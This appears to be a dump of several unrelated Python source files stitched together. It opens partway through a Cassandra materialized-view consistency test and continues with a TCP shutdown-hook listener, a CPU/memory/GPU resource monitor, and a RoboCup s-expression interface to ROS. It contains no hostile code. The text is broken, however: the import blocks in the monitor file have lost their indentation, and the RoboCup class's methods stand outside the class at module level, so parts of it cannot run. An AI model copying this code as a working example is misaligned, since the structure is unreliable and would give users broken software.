    classified into an MM subclass, which is pushed onto `queue` for the
    main thread to tally.
    """
    def execute_query(session, select_gi, i):
        # `rows` maps (a, b) -> the c value last read from the base table;
        # -1 means the key was not present in the base table.
        row = row_generate(i, num_partitions)
        if (row.a, row.b) in rows:
            base = rows[(row.a, row.b)]
        else:
            base = -1
        gi = list(session.execute(select_gi, [row.c, row.a]))
        if base == i and len(gi) == 1:
            return Match()
        elif base != i and len(gi) == 1:
            return Extra(base, i, (gi[0][0], gi[0][1], gi[0][2], gi[0][3]))
        elif base == i and len(gi) == 0:
            return Missing(base, i)
        elif base != i and len(gi) == 0:
            return Excluded()
        else:
            return Unknown()

    try:
        cluster = Cluster([ip])
        session = cluster.connect()
        select_gi = session.prepare("SELECT * FROM mvtest.mv1 WHERE c = ? AND a = ?")
        select_gi.consistency_level = readConsistency

        for i in range(start, end):
            ret = execute_query(session, select_gi, i)
            queue.put_nowait(ret)
    except Exception as e:
        print(str(e))

    queue.close()
@since('3.0')
@pytest.mark.skipif(sys.platform == 'win32', reason='Bug in python on Windows: https://bugs.python.org/issue10128')
class TestMaterializedViewsConsistency(Tester):
    """
    Consistency checks for materialized views under concurrent async writes.

    Writes rows to a base table (partly before, partly after the MV is
    created), then verifies every row through the view from reader threads,
    tallying a MutationPresence outcome per row.
    """

    def prepare(self, user_table=False):
        """Start a 3-node cluster with MVs enabled; return a session to node2."""
        cluster = self.cluster
        cluster.set_configuration_options({'enable_materialized_views': 'true'})
        cluster.populate(3).start()
        node2 = cluster.nodelist()[1]

        # Keep the status of async requests
        self.exception_type = collections.Counter()
        self.num_request_done = 0
        self.counts = {}
        for mp in MutationPresence:
            self.counts[mp] = 0
        self.rows = {}
        self.update_stats_every = 100

        logger.debug("Set to talk to node 2")
        self.session = self.patient_cql_connection(node2)
        return self.session

    def _print_write_status(self, row):
        """Log write progress plus a tally of exception types seen so far."""
        output = "\r{}".format(row)
        for key in list(self.exception_type.keys()):
            output = "{} ({}: {})".format(output, key, self.exception_type[key])
        logger.debug(output)

    def _print_read_status(self, row):
        """Log read-verification progress, broken down by MutationPresence."""
        if self.counts[MutationPresence.unknown] == 0:
            logger.debug(
                "\rOn {}; match: {}; extra: {}; missing: {}".format(
                    row,
                    self.counts[MutationPresence.match],
                    self.counts[MutationPresence.extra],
                    self.counts[MutationPresence.missing])
            )
        else:
            logger.debug(
                "\rOn {}; match: {}; extra: {}; missing: {}; WTF: {}".format(
                    row,
                    self.counts[MutationPresence.match],
                    self.counts[MutationPresence.extra],
                    self.counts[MutationPresence.missing],
                    # BUG FIX: was `MutationPresence.unkown` (misspelled), which
                    # raised AttributeError whenever an unknown outcome had been
                    # counted and this branch was taken.
                    self.counts[MutationPresence.unknown])
            )

    def _do_row(self, insert_stmt, i, num_partitions):
        """Fire one async insert for row index `i`, tracking success/failure."""
        # Error callback for async requests
        def handle_errors(row, exc):
            self.num_request_done += 1
            try:
                name = type(exc).__name__
                self.exception_type[name] += 1
            except Exception as e:
                print(traceback.format_exception_only(type(e), e))

        # Success callback for async requests
        def success_callback(row):
            self.num_request_done += 1
            if i % self.update_stats_every == 0:
                self._print_write_status(i)

        row = row_generate(i, num_partitions)
        async_ret = self.session.execute_async(insert_stmt, row)
        errors = partial(handle_errors, row)
        async_ret.add_callbacks(success_callback, errors)

    def _populate_rows(self):
        """Read the base table and record (a, b) -> c for later verification."""
        statement = SimpleStatement(
            "SELECT a, b, c FROM mvtest.test1",
            consistency_level=readConsistency
        )
        data = self.session.execute(statement)
        for row in data:
            self.rows[(row.a, row.b)] = row.c

    @pytest.mark.skip(reason='awaiting CASSANDRA-11290')
    def test_single_partition_consistent_reads_after_write(self):
        """
        Tests consistency of multiple writes to a single partition
        @jira_ticket CASSANDRA-10981
        """
        self._consistent_reads_after_write_test(1)

    def test_multi_partition_consistent_reads_after_write(self):
        """
        Tests consistency of multiple writes to a multiple partitions
        @jira_ticket CASSANDRA-10981
        """
        self._consistent_reads_after_write_test(5)

    def _consistent_reads_after_write_test(self, num_partitions):
        """Write rows around MV creation, then verify every row via the MV."""
        session = self.prepare()
        node1, node2, node3 = self.cluster.nodelist()

        # Test config
        lower = 0
        upper = 100000
        processes = 4
        queues = [None] * processes
        eachProcess = (upper - lower) // processes

        logger.debug("Creating schema")
        session.execute(
            ("CREATE KEYSPACE IF NOT EXISTS mvtest WITH replication = "
             "{'class': 'SimpleStrategy', 'replication_factor': '3'}")
        )
        session.execute(
            "CREATE TABLE mvtest.test1 (a int, b int, c int, d int, PRIMARY KEY (a,b))"
        )
        session.cluster.control_connection.wait_for_schema_agreement()

        insert1 = session.prepare("INSERT INTO mvtest.test1 (a,b,c,d) VALUES (?,?,?,?)")
        insert1.consistency_level = writeConsistency

        # First 10% of the writes happen before the MV exists.
        logger.debug("Writing data to base table")
        for i in range(upper // 10):
            self._do_row(insert1, i, num_partitions)

        logger.debug("Creating materialized view")
        session.execute(
            ('CREATE MATERIALIZED VIEW mvtest.mv1 AS '
             'SELECT a,b,c,d FROM mvtest.test1 WHERE a IS NOT NULL AND b IS NOT NULL AND '
             'c IS NOT NULL PRIMARY KEY (c,a,b)')
        )
        session.cluster.control_connection.wait_for_schema_agreement()

        # Remaining 90% of the writes race against the view build.
        logger.debug("Writing more data to base table")
        for i in range(upper // 10, upper):
            self._do_row(insert1, i, num_partitions)

        # Wait that all requests are done
        while self.num_request_done < upper:
            time.sleep(1)

        logger.debug("Making sure all batchlogs are replayed on node1")
        node1.nodetool("replaybatchlog")
        logger.debug("Making sure all batchlogs are replayed on node2")
        node2.nodetool("replaybatchlog")
        logger.debug("Making sure all batchlogs are replayed on node3")
        node3.nodetool("replaybatchlog")

        logger.debug("Finished writes, now verifying reads")
        self._populate_rows()

        # Fan the verification out over `processes` reader threads, each
        # covering a contiguous slice of the index range with its own queue.
        threads = []
        for i in range(processes):
            start = lower + (eachProcess * i)
            if i == processes - 1:
                end = upper
            else:
                end = lower + (eachProcess * (i + 1))
            q = Queue()
            node_ip = get_ip_from_node(node2)
            t = threading.Thread(target=thread_session, args=(node_ip, q, start, end, self.rows, num_partitions))
            threads.append(t)
            t.daemon = True
            t.start()
            queues[i] = q

        for i in range(lower, upper):
            if i % 100 == 0:
                self._print_read_status(i)
            try:
                mm = queues[i % processes].get(timeout=60)
            except Empty as e:
                pytest.skip("Failed to get range {range} within timeout from queue. {error}".format(range=i, error=str(e)))
            if not mm.out() is None:
                logger.debug("\r{}\n" .format(mm.out()))
            self.counts[mm.mp] += 1

        self._print_read_status(upper)
        for thread in threads:
            thread.join(timeout=300)
@since('3.0')
class TestMaterializedViewsLockcontention(Tester):
    """
    Test materialized views lock contention.
    @jira_ticket CASSANDRA-12689
    @since 3.0
    """

    def _prepare_cluster(self):
        """Start a 1-node cluster with MVs enabled and write concurrency 1.

        Returns a session with keyspace `locktest`, a base table `test`,
        and the MV `test_sorted_mv` already created.
        """
        self.cluster.populate(1)
        self.cluster.set_configuration_options({'enable_materialized_views': 'true'})
        # NOTE(review): this rebinds the `supports_v5_protocol` method name on
        # the instance to its bool result - confirm this matches the
        # convention used by sibling dtests.
        self.supports_v5_protocol = self.supports_v5_protocol(self.cluster.version())
        self.protocol_version = 5 if self.supports_v5_protocol else 4

        # Single writer threads so the injected MV lock failures contend.
        self.cluster.set_configuration_options(values={
            'concurrent_materialized_view_writes': 1,
            'concurrent_writes': 1,
        })
        self.nodes = list(self.cluster.nodes.values())
        # Test hook: presumably forces MV lock acquisition to fail 64 times -
        # see CASSANDRA-12689.
        self.cluster.start(jvm_args=[
            "-Dcassandra.test.fail_mv_locks_count=64"
        ])

        session = self.patient_exclusive_cql_connection(self.nodes[0], protocol_version=self.protocol_version)

        keyspace = "locktest"
        session.execute("""
                CREATE KEYSPACE IF NOT EXISTS {}
                WITH replication = {{ 'class': 'SimpleStrategy', 'replication_factor': '1' }}
            """.format(keyspace))
        session.set_keyspace(keyspace)

        session.execute(
            "CREATE TABLE IF NOT EXISTS test (int1 int, int2 int, date timestamp, PRIMARY KEY (int1, int2))")
        session.execute("""CREATE MATERIALIZED VIEW test_sorted_mv AS
                SELECT int1, date, int2
                FROM test
                WHERE int1 IS NOT NULL AND date IS NOT NULL AND int2 IS NOT NULL
                PRIMARY KEY (int1, date, int2)
                WITH CLUSTERING ORDER BY (date DESC, int2 DESC)""")

        return session

    @since('3.0')
    def test_mutations_dontblock(self):
        """Concurrent MV writes must complete and leave no pending mutations."""
        session = self._prepare_cluster()
        records = 100
        records2 = 100
        params = []
        for x in range(records):
            for y in range(records2):
                params.append([x, y])

        execute_concurrent_with_args(
            session,
            session.prepare('INSERT INTO test (int1, int2, date) VALUES (?, ?, toTimestamp(now()))'),
            params
        )

        assert_one(session, "SELECT count(*) FROM test WHERE int1 = 1", [records2])

        # Verify over JMX that the MutationStage thread pool drained.
        for node in self.nodes:
            with JolokiaAgent(node) as jmx:
                mutationStagePending = jmx.read_attribute(
                    make_mbean('metrics', type="ThreadPools", path='request', scope='MutationStage', name='PendingTasks'), "Value"
                )
                assert 0 == mutationStagePending, "Pending mutations: {}".format(mutationStagePending)
|
shutdn.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2022 Busana Apparel Group. All rights reserved.
#
# This product and it's source code is protected by patents, copyright laws and
# international copyright treaties, as well as other intellectual property
# laws and treaties. The product is licensed, not sold.
#
# The source code and sample programs in this package or parts hereof
# as well as the documentation shall not be copied, modified or redistributed
# without permission, explicit or implied, of the author.
#
# This module is part of Centric PLM Integration Bridge and is released under
# the Apache-2.0 License: https://www.apache.org/licenses/LICENSE-2.0
from threading import Thread, RLock
from socket import AF_INET, socket, SOCK_STREAM
from common.startable import Startable
from common.singleton import SingletonObject
from common import consts
import logging
import selectors
class ShutdownHookMonitor(Startable, SingletonObject):
    """Singleton TCP listener used to shut the bridge down remotely.

    A client connects to the configured address/port and sends the line
    ``shut``; the listener then stops the service.
    """

    def __init__(self, config=None):
        super(ShutdownHookMonitor, self).__init__(config=config)
        self.socket = None           # listening server socket
        self.selector = None         # selector multiplexing accept/read events
        self.shutdown_thread = None  # daemon thread running listen()
        self.shutdown_addr = None
        self.shutdown_port = None

    def send_shutdown_signal(self):
        """Connect to the monitor endpoint and send the "shut" command."""
        config = self.get_configuration()
        self.shutdown_addr = config[consts.SHUTDOWN_ADDR] if config and consts.SHUTDOWN_ADDR in config \
            else consts.DEFAULT_SHUTDOWN_ADDR
        self.shutdown_port = config[consts.SHUTDOWN_PORT] if config and consts.SHUTDOWN_PORT in config \
            else consts.DEFAULT_SHUTDOWN_PORT
        # Configuration may store the port as a string.
        self.shutdown_port = int(self.shutdown_port) if isinstance(self.shutdown_port, str) else self.shutdown_port
        client = socket(AF_INET, SOCK_STREAM)
        client.connect((self.shutdown_addr, self.shutdown_port))
        try:
            fd = client.makefile(mode="w")
            try:
                fd.write("shut\n")
                fd.flush()
            finally:
                fd.close()
        finally:
            client.close()

    def join(self, timeout=None):
        """Block until the listener thread terminates (or `timeout` elapses).

        Raises if the listener is not running.
        """
        if not self.is_running():
            raise Exception("Shutdown Listener is not Running")
        self.shutdown_thread.join(timeout)

    def do_configure(self):
        """Resolve address/port from configuration and create the listener objects."""
        config = self.get_configuration()
        self.selector = selectors.DefaultSelector()
        self.socket = socket(AF_INET, SOCK_STREAM)
        self.shutdown_addr = config[consts.SHUTDOWN_ADDR] if config and consts.SHUTDOWN_ADDR in config \
            else consts.DEFAULT_SHUTDOWN_ADDR
        self.shutdown_port = config[consts.SHUTDOWN_PORT] if config and consts.SHUTDOWN_PORT in config \
            else consts.DEFAULT_SHUTDOWN_PORT
        self.shutdown_port = int(self.shutdown_port) if isinstance(self.shutdown_port, str) else self.shutdown_port
        self.shutdown_thread = Thread(target=self.listen, daemon=True, name="StopMonitor")

    def do_start(self):
        self.shutdown_thread.start()

    def do_stop(self):
        # Closing the listening socket unblocks/errors the selector loop so
        # listen() can observe is_running() == False and exit.
        if not self.socket:
            return
        try:
            self.socket.close()
        except Exception as ex:
            logging.exception(ex)

    def listen(self):
        """Accept connections and stop the service when a "shut" line arrives."""
        should_terminate = False
        self.socket.bind((self.shutdown_addr, self.shutdown_port))
        self.socket.setblocking(False)
        self.socket.listen(1)
        self.selector.register(self.socket, selectors.EVENT_READ)
        while self.is_running():
            try:
                events = self.selector.select(timeout=2)
                for ev, _ in events:
                    event_socket = ev.fileobj
                    if event_socket == self.socket:
                        # New client: register it for a single read.
                        conn, __ = event_socket.accept()
                        conn.setblocking(False)
                        self.selector.register(conn, selectors.EVENT_READ)
                    else:
                        try:
                            fp = event_socket.makefile('r', buffering=1024)
                            message = fp.readline()
                            fp.close()
                            should_terminate = isinstance(message, str) and (message.strip().lower() == 'shut')
                        finally:
                            # BUG FIX: the connection must be unregistered
                            # before it is closed; otherwise the selector keeps
                            # polling a closed fd and select() raises on every
                            # subsequent loop iteration.
                            self.selector.unregister(event_socket)
                            event_socket.close()
            except Exception as ex:
                logging.error(ex)
            finally:
                self.stop() if should_terminate else None
|
monitor.py | """ Monitoring (memory usage, cpu/gpu utilization) tools. """
import os
import time
from math import ceil
from ast import literal_eval
from multiprocessing import Process, Manager, Queue
import numpy as np
import matplotlib.pyplot as plt
try:
import psutil
except ImportError:
pass
try:
import nvidia_smi
except ImportError:
# Use this value to raise ImportError later
nvidia_smi = None
class ResourceMonitor:
    """ Periodically runs supplied function in a separate process and stores its outputs.
    The created process runs infinitely until it is killed by SIGKILL signal.

    Parameters
    ----------
    function : callable
        Function to use. If not provided, defaults to the `get_usage` static method.
    frequency : number
        Periodicity of function calls in seconds.
    **kwargs
        Passed directly to `function` calls.

    Attributes
    ----------
    data : list
        Collected function outputs. Preserved between multiple runs.
    ticks : list
        Times of function calls. Preserved between multiple runs.
    """
    def __init__(self, function=None, frequency=0.1, **kwargs):
        self.function = function or self.get_usage
        self.frequency = frequency
        self.kwargs = kwargs
        # Remember the creating process id so per-process monitors (RSS, VMS,
        # USS) measure this process, not the child doing the sampling.
        self.pid = os.getpid()

        self.running = False
        self.manager = None      # multiprocessing.Manager owning the shared list
        self.stop_queue = None   # signals the sampling process to exit
        self.shared_list = None  # cross-process storage for samples
        self.process = None

        self.start_time, self.prev_time, self.end_time = None, None, None
        self.ticks, self.data = [], []

    @staticmethod
    def endless_repeat(shared_list, stop_queue, function, frequency, **kwargs):
        """ Repeatedly call `function`, storing results, until a stop signal is received. """
        while stop_queue.empty():
            # As this process is killed ungracefully, it can be shut down in the middle of data appending.
            # We let Python handle it by ignoring the exception.
            try:
                shared_list.append(function(**kwargs))
            except (BrokenPipeError, ConnectionResetError):
                pass
            time.sleep(frequency)

    def start(self):
        """ Start a separate process with function calls every `frequency` seconds. """
        self.running = True
        self.manager = Manager()
        self.shared_list = self.manager.list()
        self.stop_queue = Queue()
        self.start_time = time.time()
        self.prev_time = self.start_time

        args = self.shared_list, self.stop_queue, self.function, self.frequency
        self.process = Process(target=self.endless_repeat, args=args, kwargs={'pid': self.pid, **self.kwargs})
        self.process.start()

    def fetch(self):
        """ Append collected data to the instance attributes. """
        n = len(self.data)

        # We copy data so additional points don't appear during this function execution
        self.data = self.shared_list[:]
        self.end_time = time.time()

        # Compute one more entry synchronously in this process.
        point = self.function(pid=self.pid, **self.kwargs)
        tick = time.time()

        # Update timestamps, append additional entries everywhere.
        # Timestamps for the new samples are interpolated evenly between the
        # previous fetch and now, since the child does not record them.
        # If data was appended to `shared_list` during the execution of this function, the order might be wrong;
        # But, as it would mean that the time between calls to `self.function` is very small, it is negligible.
        self.ticks.extend(np.linspace(self.prev_time, self.end_time, num=len(self.data) - n).tolist())

        self.data.append(point)
        self.shared_list.append(point)
        self.ticks.append(tick)

        self.prev_time = time.time()

    def stop(self):
        """ Stop separate process. """
        if self.running:
            self.stop_queue.put(True)
            self.process.join()
            self.running = False
            self.manager.shutdown()

    def __enter__(self):
        self.start()
        return self

    def __exit__(self, exc_type, exc_value, exc_traceback):
        # Pull remaining samples before shutting the child down.
        self.fetch()
        self.stop()

    def visualize(self):
        """ Simple plots of collected data-points. """
        plt.figure(figsize=(8, 6))
        plt.plot(np.array(self.ticks) - self.ticks[0], self.data)

        name = self.__class__.__name__
        if 'GPU' in name:
            used_gpus = self.kwargs.get('gpu_list', get_current_gpus())
            if len(used_gpus) == 1:
                name = f'{name} on device `{used_gpus[0]}`'
            else:
                name = f'{name} on devices `{str(used_gpus)[1:-1]}`'
        title = f'{name}\nMEAN: {np.mean(self.data):4.4} STD: {np.std(self.data):4.4}'
        plt.title(title)
        plt.xlabel('Time, s', fontsize=12)
        # `UNIT` is defined by each concrete subclass.
        plt.ylabel(self.UNIT, fontsize=12, rotation='horizontal', labelpad=15)
        plt.grid(True)
        plt.show()
class CPUMonitor(ResourceMonitor):
    """ Track CPU usage. """
    UNIT = '%'

    @staticmethod
    def get_usage(**kwargs):
        """ Return system-wide CPU utilization as a percentage. """
        _ = kwargs  # extra keyword args from the monitor loop are ignored
        return psutil.cpu_percent()
class MemoryMonitor(ResourceMonitor):
    """ Track total virtual memory usage. """
    UNIT = 'Gb'

    @staticmethod
    def get_usage(**kwargs):
        """ Return system-wide used virtual memory, in gigabytes. """
        _ = kwargs  # extra keyword args from the monitor loop are ignored
        used_bytes = psutil.virtual_memory().used
        return used_bytes / (1024 ** 3)
class RSSMonitor(ResourceMonitor):
    """ Track non-swapped physical memory usage. """
    UNIT = 'Gb'

    @staticmethod
    def get_usage(pid=None, **kwargs):
        """ Return the resident set size of process `pid`, in gigabytes. """
        _ = kwargs  # extra keyword args from the monitor loop are ignored
        return psutil.Process(pid).memory_info().rss / (1024 ** 3)
class VMSMonitor(ResourceMonitor):
    """ Track current process virtual memory usage. """
    UNIT = 'Gb'

    @staticmethod
    def get_usage(pid=None, **kwargs):
        """ Return the virtual memory size of process `pid`, in gigabytes. """
        _ = kwargs  # extra keyword args from the monitor loop are ignored
        return psutil.Process(pid).memory_info().vms / (1024 ** 3)
class USSMonitor(ResourceMonitor):
    """ Track current process unique virtual memory usage. """
    UNIT = 'Gb'

    @staticmethod
    def get_usage(pid=None, **kwargs):
        """ Return the unique set size of process `pid`, in gigabytes. """
        _ = kwargs  # extra keyword args from the monitor loop are ignored
        return psutil.Process(pid).memory_full_info().uss / (1024 ** 3)
def get_current_gpus():
    """ Return device numbers parsed from `CUDA_VISIBLE_DEVICES`, or [0] if unset.

    The variable is evaluated as a Python literal: "2" yields [2], while a
    comma-separated value such as "1,3" (a tuple literal) yields [1, 3].
    """
    devices = literal_eval(os.environ.get('CUDA_VISIBLE_DEVICES', '0'))
    if isinstance(devices, tuple):
        return list(devices)
    return [devices]
class GPUMonitor(ResourceMonitor):
    """ Track GPU usage. """
    UNIT = '%'

    def __init__(self, *args, **kwargs):
        # `nvidia_smi` is an optional import at module level; fail fast here.
        if nvidia_smi is None:
            raise ImportError('Install Python interface for nvidia_smi')
        super().__init__(*args, **kwargs)

    @staticmethod
    def get_usage(gpu_list=None, **kwargs):
        """ Return the utilization percentage for each GPU in `gpu_list`. """
        _ = kwargs
        gpu_list = gpu_list or get_current_gpus()

        nvidia_smi.nvmlInit()
        handle = [nvidia_smi.nvmlDeviceGetHandleByIndex(i) for i in gpu_list]
        res = [nvidia_smi.nvmlDeviceGetUtilizationRates(item) for item in handle]
        usage = [item.gpu for item in res]
        # CONSISTENCY FIX: release the NVML context after each sample, as
        # `GPUMemoryMonitor.get_usage` already does; previously nvmlInit was
        # called on every sample without a matching nvmlShutdown.
        nvidia_smi.nvmlShutdown()
        return usage
class GPUMemoryUtilizationMonitor(ResourceMonitor):
    """ Track GPU memory utilization. """
    UNIT = '%'

    def __init__(self, *args, **kwargs):
        # `nvidia_smi` is an optional import at module level; fail fast here.
        if nvidia_smi is None:
            raise ImportError('Install Python interface for nvidia_smi')
        super().__init__(*args, **kwargs)

    @staticmethod
    def get_usage(gpu_list=None, **kwargs):
        """ Return the memory-utilization percentage for each GPU in `gpu_list`. """
        _ = kwargs
        gpu_list = gpu_list or get_current_gpus()

        nvidia_smi.nvmlInit()
        handle = [nvidia_smi.nvmlDeviceGetHandleByIndex(i) for i in gpu_list]
        res = [nvidia_smi.nvmlDeviceGetUtilizationRates(item) for item in handle]
        usage = [item.memory for item in res]
        # CONSISTENCY FIX: release the NVML context after each sample, as
        # `GPUMemoryMonitor.get_usage` already does; previously nvmlInit was
        # called on every sample without a matching nvmlShutdown.
        nvidia_smi.nvmlShutdown()
        return usage
class GPUMemoryMonitor(ResourceMonitor):
    """ Track GPU memory usage. """
    UNIT = '%'

    def __init__(self, *args, **kwargs):
        # `nvidia_smi` is an optional import at module level; fail fast here.
        if nvidia_smi is None:
            raise ImportError('Install Python interface for nvidia_smi')
        super().__init__(*args, **kwargs)

    @staticmethod
    def get_usage(gpu_list=None, **kwargs):
        """ Track GPU memory usage. """
        _ = kwargs
        gpu_list = gpu_list or get_current_gpus()

        nvidia_smi.nvmlInit()
        handle = [nvidia_smi.nvmlDeviceGetHandleByIndex(i) for i in gpu_list]
        res = [nvidia_smi.nvmlDeviceGetMemoryInfo(item) for item in handle]
        # Percentage of each device's total memory currently in use.
        res = [100 * item.used / item.total for item in res]
        nvidia_smi.nvmlShutdown()
        return res
# Canonical table: monitor class -> accepted string aliases.
MONITOR_ALIASES = {
    MemoryMonitor: ['mmonitor', 'memory', 'memorymonitor'],
    CPUMonitor: ['cmonitor', 'cpu', 'cpumonitor'],
    RSSMonitor: ['rss'],
    VMSMonitor: ['vms'],
    USSMonitor: ['uss'],
    GPUMonitor: ['gpu'],
    GPUMemoryMonitor: ['gpu_memory'],
    GPUMemoryUtilizationMonitor: ['gpu_memory_utilization']
}
# Inverted for lookup: alias string -> monitor class (used by `Monitor.__init__`).
MONITOR_ALIASES = {alias: monitor for monitor, aliases in MONITOR_ALIASES.items()
                   for alias in aliases}
class Monitor(list):
    """ Holder for multiple monitors with simple visualization method.

    Behaves as a list of monitor instances; string aliases are resolved
    through `MONITOR_ALIASES`. Supports the context-manager protocol:
    entering starts every monitor, exiting fetches their data and stops them.
    """

    def __init__(self, monitors=('cpu', 'memory', 'gpu'), frequency=0.1, **kwargs):
        """Resolve aliases/instances into monitor objects and store them."""
        monitors = [monitors] if not isinstance(monitors, (tuple, list)) else monitors
        monitors = [MONITOR_ALIASES[monitor.lower()](frequency=frequency, **kwargs)
                    if isinstance(monitor, str) else monitor
                    for monitor in monitors]
        super().__init__(monitors)

    def __enter__(self):
        for monitor in self:
            monitor.start()
        # BUG FIX: was `len(self) == 0`, which raised IndexError on an empty
        # holder and returned the whole list for a single monitor. Return the
        # lone monitor when there is exactly one, else the holder itself.
        return self[0] if len(self) == 1 else self

    def __exit__(self, exc_type, exc_value, exc_traceback):
        # Collect the final samples before shutting each monitor down.
        for monitor in self:
            monitor.fetch()
            monitor.stop()

    def visualize(self, layout=None, figsize=None, suptitle='', savepath=None, show=True):
        """ Visualize multiple monitors in a single figure.

        Parameters
        ----------
        layout : tuple of ints
            Grid layout of plots.
        figsize : tuple of numbers
            Size of figure: width and height.
        suptitle : str
            Title for the figure.
        savepath : str, optional
            If given, the figure is saved to this path.
        show : bool
            Whether to display the figure (it is closed otherwise).
        """
        if layout is None:
            # Up to 3 plots per row.
            layout = ceil(len(self) / 3), 3 if len(self) > 2 else len(self)
        figsize = figsize or (7 * layout[1], 8 * layout[0])

        fig, ax = plt.subplots(*layout, figsize=figsize)
        ax = np.atleast_2d(ax)

        for i, monitor in enumerate(self):
            name = monitor.__class__.__name__
            if 'GPU' in name:
                used_gpus = monitor.kwargs.get('gpu_list', get_current_gpus())
                if len(used_gpus) == 1:
                    name = f'{name} on device `{used_gpus[0]}`'
                else:
                    name = f'{name} on devices `{str(used_gpus)[1:-1]}`'
            title = f'{name}\nMEAN: {np.mean(monitor.data):4.4} STD: {np.std(monitor.data):4.4}'

            ax[i // layout[1], i % layout[1]].plot(np.array(monitor.ticks) - monitor.ticks[0], monitor.data)
            ax[i // layout[1], i % layout[1]].set_title(title, fontsize=16)
            ax[i // layout[1], i % layout[1]].set_xlabel('Time, s', fontsize=14)
            ax[i // layout[1], i % layout[1]].set_ylabel(monitor.UNIT, fontsize=12, rotation='horizontal', labelpad=15)
            ax[i // layout[1], i % layout[1]].grid(True)

        # Hide unused grid cells.
        for i in range(len(self), layout[0] * layout[1]):
            ax[i // layout[1], i % layout[1]].set_axis_off()

        if suptitle:
            fig.suptitle(suptitle, fontsize=24)
        if savepath:
            plt.savefig(savepath, bbox_inches='tight', pad_inches=0)
        if show:
            plt.show()
        else:
            plt.close()
|
sExprInterface.py | #!/usr/bin/python
"""
# Copyright (C) 2014-2015 Open Source Robotics Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Script for restoring RoboCup 3D sim game from logfile
# Written by Patrick MacAlpine (patmac@cs.utexas.edu)
# Usage: ./sExprInterface.py <logFile> [host] [port]
"""
import config
import os
import sys
import struct
import socket #for sockets
import threading
import time
import rospy
from threading import Lock
from robocup_msgs.msg import AgentState
from robocup_msgs.msg import Beam
from robocup_msgs.srv import SendJoints
from robocup_msgs.srv import InitAgent
from robocup_msgs.srv import MoveAgentPose
class agentInterface:
    """Bridges a RoboCup 3D-sim agent speaking the s-expression protocol to ROS.

    Incoming agent messages are parsed into ``_agent*`` fields; outgoing
    server messages are built from cached ``_server*`` fields.
    """
    def __init__(self):
        # Agent internal data values
        self._agentTree = []
        self._initializeAgentValues()
        # Server internal data values
        self._serverTree = []
        self._initializeServerValues()
        # Simulation clock in seconds; note _initializeServerValues() does not
        # reset this (its reset lines are commented out there).
        self._serverTime = 0
        # rospy.Time stamps used to throttle state/perception/message traffic.
        self._lastStateTime = rospy.Time()
        self._lastPerceptionTime = rospy.Time()
        self._lastMessageSentTime = rospy.Time()
        # Guards all _server* fields shared with the ROS subscriber callback.
        self.mutex = Lock()
# Get tree from s-expression
def _getTreeFromSExpr(self, sExpr):
    """Parse an s-expression string into nested lists of token strings.

    Tokens are split on whitespace; '(' opens a new child list, ')' closes
    the current one, and any other character accumulates into a symbol that
    is flushed on '(' / ')' or at a whitespace boundary.
    """
    tree = []
    current = tree
    stack = [current]
    tokens = sExpr.split()
    symbol = ""
    for t in tokens:
        # A whitespace boundary terminates any symbol still being accumulated.
        if symbol != "":
            current.append(symbol)
            symbol = ""
        for i in range(len(t)):
            if '(' == t[i]:
                if symbol != "":
                    current.append(symbol)
                empty = []
                current.append(empty)
                stack.append(current)
                current = empty
                symbol = ""
            elif ')' == t[i]:
                if symbol != "":
                    current.append(symbol)
                    symbol = ""
                current = stack.pop()
            else:
                symbol = symbol + t[i]
    # NOTE: a trailing symbol not followed by ')' or whitespace would be
    # dropped here; well-formed s-expressions always end with ')'.
    return tree
# == Private agent methods ==
def _initializeAgentValues(self):
    """Reset all agent-message fields to their empty/unset defaults."""
    self._agentScene = None
    self._agentInit = None
    self._agentBeam = None
    self._agentJointRequests = []
    self._agentSay = None
def _populateAgentValuesFromTree(self):
    """Scan self._agentTree and cache scene/init/beam/joint/say values (Python 2)."""
    self._initializeAgentValues()
    for i in self._agentTree:
        if i[0] == 'scene':
            self._agentScene = i[1]
        elif i[0] == 'init':
            # (init (unum N) (teamname T)) -> (N, T)
            self._agentInit = (i[1][1], i[2][1])
        elif i[0] == 'beam':
            self._agentBeam = (i[1], i[2], i[3])
        elif i[0].startswith("he") or i[0].startswith("lae") or i[0].startswith("lle") or i[0].startswith("rae") or i[0].startswith("rle"):
            # Joint effector prefixes: head (he), left/right arm (lae/rae),
            # left/right leg (lle/rle).
            self._agentJointRequests.append((i[0], i[1]))
        elif i[0] == 'say':
            self._agentSay = i[1]
        elif i[0] != 'syn':
            print "Unknown agent message type: " + i[0]
# == Public agent methods ==
def printAgentValues(self):
    """Debug-print every cached agent-side value (Python 2 print statements)."""
    print "Scene: " + str(self.getAgentScene())
    print "Init: " + str(self.getAgentInit())
    print "Beam: " + str(self.getAgentBeam())
    print "JointRequests: " + str(self.getAgentJointRequests())
    print "Say: " + str(self.getAgentSay())
def getAgentScene(self):
    """Return the requested scene string, or None if no scene message arrived."""
    return self._agentScene

def getAgentInit(self):
    """Return (unum, teamname) from the init message, or None if absent."""
    return self._agentInit

def getAgentBeam(self):
    """Return (x, y, angle) beam values, or None if absent."""
    return self._agentBeam

def getAgentJointRequests(self):
    """Return the list of (jointName, value) effector requests."""
    return self._agentJointRequests

def getAgentSay(self):
    """Return the say message payload, or None if absent."""
    return self._agentSay
# == Private server methods ==
def _initializeServerValues(self):
    """Reset server-side caches to per-cycle defaults.

    Game-state fields default to a freshly-connected left-side agent, and
    both feet default to zero force, so a complete agent message can be
    built before the first real server update. _serverTime is deliberately
    left untouched (its reset lines are commented out below).
    """
    #self._serverTime = None
    #self._serverTime = 0
    #self._serverGameStateID = None
    self._serverGameStateID = 1
    #self._serverGameStateSide = None
    self._serverGameStateSide = 'left'
    #self._serverGameStateTime = None
    self._serverGameStateTime = 0
    #self._serverGameStatePlayMode = None
    self._serverGameStatePlayMode = 'BeforeKickOff'
    self._serverGameStateScoreLeft = None
    self._serverGameStateScoreRight = None
    self._serverGyro = None
    self._serverAccel = None
    #self._serverForceResistancePerceptors = []
    # Both feet report zero force by default.
    self._serverForceResistancePerceptors = [('lf', (0, 0, 0), (0, 0, 0)), ('rf', (0, 0, 0), (0, 0, 0))]
    self._serverHingeJoints = []
    self._serverHear = None
    self._serverSeenObjects = []
